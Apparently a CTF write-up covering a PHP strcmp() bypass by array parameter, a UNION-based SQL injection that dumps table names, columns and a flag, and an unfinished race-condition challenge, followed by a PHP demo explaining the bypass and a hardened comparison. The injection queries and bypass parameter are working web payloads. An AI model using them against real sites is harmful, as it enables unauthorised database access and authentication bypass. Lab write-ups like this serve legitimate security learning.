easyweb

I forgot to pull down the source. The challenge roughly tests the PHP strcmp() function; bypass it directly with an array:

    ?password[]=shit

成绩单 (Report Card)

A freebie: UNION injection with no filtering at all, so I took first blood right away.

    id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()# //fl4g,sc
    id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='fl4g'# //flag
    id=-1' union select 1,flag,3,4 from fl4g# //flag{Sql_INJECT0N_4813drd8hz4}

shop

Topic tested: race condition. To be honest, at first I……
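For the easyweb challenge above, this added example (not the challenge's code, whose source is not on the page) shows why an array parameter defeats a loose strcmp() check and how a type-checked comparison closes it. The names SECRET, check_weak and check_strict and the shape of the weak check are assumptions for illustration.

```php
<?php
// Constructed secret for the demo; the real challenge value is unknown.
const SECRET = 'correct horse';

// Assumed shape of the vulnerable check: loose comparison on strcmp()'s result.
function check_weak($input): bool
{
    try {
        // PHP < 8: strcmp(array, string) emits a warning and returns NULL,
        // and NULL == 0 evaluates to true, so the check passes.
        return @strcmp($input, SECRET) == 0;
    } catch (TypeError $e) {
        // PHP >= 8 throws a TypeError for an array argument instead.
        return false;
    }
}

// Hardened check: reject anything that is not a string, then compare
// in constant time with a strict boolean result.
function check_strict($input): bool
{
    return is_string($input) && hash_equals(SECRET, $input);
}

// parse_str() builds the same structure PHP puts in $_GET for this query.
parse_str('password[]=shit', $query);
$password = $query['password'];

echo 'PHP version:           ', PHP_VERSION, PHP_EOL;
echo 'parameter is an array: ', var_export(is_array($password), true), PHP_EOL;
echo 'weak check accepts:    ', var_export(check_weak($password), true), PHP_EOL;
echo 'strict check accepts:  ', var_export(check_strict($password), true), PHP_EOL;
echo 'strict, right secret:  ', var_export(check_strict(SECRET), true), PHP_EOL;
```

The weak check only accepts the array on PHP versions before 8; the strict check rejects it on every version because the is_string() test runs before any comparison.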